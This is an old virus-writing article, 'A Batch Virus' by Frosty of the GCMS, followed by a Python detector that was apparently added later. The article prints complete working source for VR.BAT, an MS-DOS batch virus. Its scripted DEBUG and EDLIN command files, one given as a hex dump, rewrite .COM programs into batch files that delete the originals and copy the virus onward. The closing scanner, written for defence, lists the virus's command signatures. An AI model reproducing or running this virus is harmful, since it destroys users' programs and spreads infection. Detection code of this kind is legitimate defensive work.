A Batch Virus

by Frosty of the GCMS

Whoever thought that viruses could be in batch files?

The virus we are about to see relies on the MS-DOS operating system, specifically on its DEBUG and EDLIN programs.

VR.BAT

Contents:

ECHO = OFF          ; Self explanatory
CTTY NUL            ; This is important. Console output is turned off
PATH C:\MSDOS       ; May differ on other systems
DIR /W *.COM > IND  ; The directory is written on 'IND' ONLY name entries
EDLIN IND < 1       ; 'IND' is processed with EDLIN so only file names appear
DEBUG IND < 2       ; New batch program is created with DEBUG
EDLIN NAME.BAT < 3  ; This batch goes to an executable form because of EDLIN
CTTY CON            ; Console interface is again assigned
NAME.BAT            ; Newly created NAME.BAT is called

In addition to this batch file, there are command files, here named 1, 2, and 3.

Here is the first command file:

1

1,4D  ; Here lines 1-4 of the IND file are deleted
E     ; Save file

Here is the second command file (DEBUG commands):

2

M100,10B,F000    ; First program name is moved to the F000H address to save
E108 ".BAT"      ; Extension of file name is changed to .BAT
M100,10B,F010    ; File is saved again
E100 "DEL "      ; DEL command is written to address 100H
MF000,F00B,104   ; Original file is written after this command
E10C 2E          ; Period is placed in front of extension
E110 0D,0A       ; Carriage return plus line feed
MF010,F020,11F   ; Modified file is moved to 11FH address from buffer area
E112 "COPY \VR.BAT" ; COPY command is now placed in front of file
E12B 0D,0A       ; COPY command terminated with carriage return plus line feed
RXC              ; The CX register is ...
2C               ; Set to 2CH
N NAME.BAT       ; Name it NAME.BAT
W                ; Write
Q                ; Quit

The third command file must be shown as a hex dump because it contains two control characters (1A = Control-Z) and so is not entirely printable.

Hex dump of the third command file:

3

0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

In order for this virus to work, VR.BAT should be in the root.  This program only affects COM files.
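As an added defensive example (not part of the original article), the following Python scanner looks for the command pattern VR.BAT relies on: the console muted with CTTY NUL, a listing of COM files redirected to a work file, EDLIN and DEBUG driven from redirected script files, and a batch file built that way being executed by name. The indicator names, the scoring rule and the two sample batch texts are this example's own assumptions.

```python
import re

# Indicators taken from the VR.BAT listing above.  Names and the scoring
# rule below are this example's own, not anything from the article.
INDICATORS = {
    "console_muted": re.compile(r"^\s*CTTY\s+NUL\b", re.I),
    "com_listing_to_file": re.compile(r"^\s*DIR\b.*\*\.COM\b.*>", re.I),
    "edlin_scripted": re.compile(r"^\s*EDLIN\s+\S+\s*<", re.I),
    "debug_scripted": re.compile(r"^\s*DEBUG\s+\S+\s*<", re.I),
}
# A .BAT file that is an EDLIN target and is later executed by bare name.
EDLIN_BAT = re.compile(r"^\s*EDLIN\s+(\S+\.BAT)\s*<", re.I)

def scan_batch(text):
    """Return the set of indicator names found in one batch file's text."""
    hits = set()
    built_bats = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue
        for name, pat in INDICATORS.items():
            if pat.search(line):
                hits.add(name)
        m = EDLIN_BAT.search(line)
        if m:
            built_bats.add(m.group(1).upper())
        if line.upper() in built_bats:
            hits.add("runs_generated_bat")
    return hits

def is_suspicious(text):
    """Flag a file that drives DEBUG/EDLIN from scripts and then runs a batch
    file it built itself, or that shows three or more indicators at once."""
    hits = scan_batch(text)
    tooling = {"edlin_scripted", "debug_scripted"} & hits
    return ("runs_generated_bat" in hits and bool(tooling)) or len(hits) >= 3

# Constructed samples: the VR.BAT command sequence from the article with its
# comments removed, and an ordinary batch file that only lists COM files.
VR_BAT = "ECHO = OFF\nCTTY NUL\nPATH C:\\MSDOS\nDIR /W *.COM > IND\n" \
         "EDLIN IND < 1\nDEBUG IND < 2\nEDLIN NAME.BAT < 3\nCTTY CON\nNAME.BAT\n"
BENIGN_BAT = "ECHO OFF\nPATH C:\\MSDOS\nDIR /W *.COM > IND\nTYPE IND\n"

if __name__ == "__main__":
    for label, text in (("VR.BAT", VR_BAT), ("benign", BENIGN_BAT)):
        print(label, sorted(scan_batch(text)), is_suspicious(text))
```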
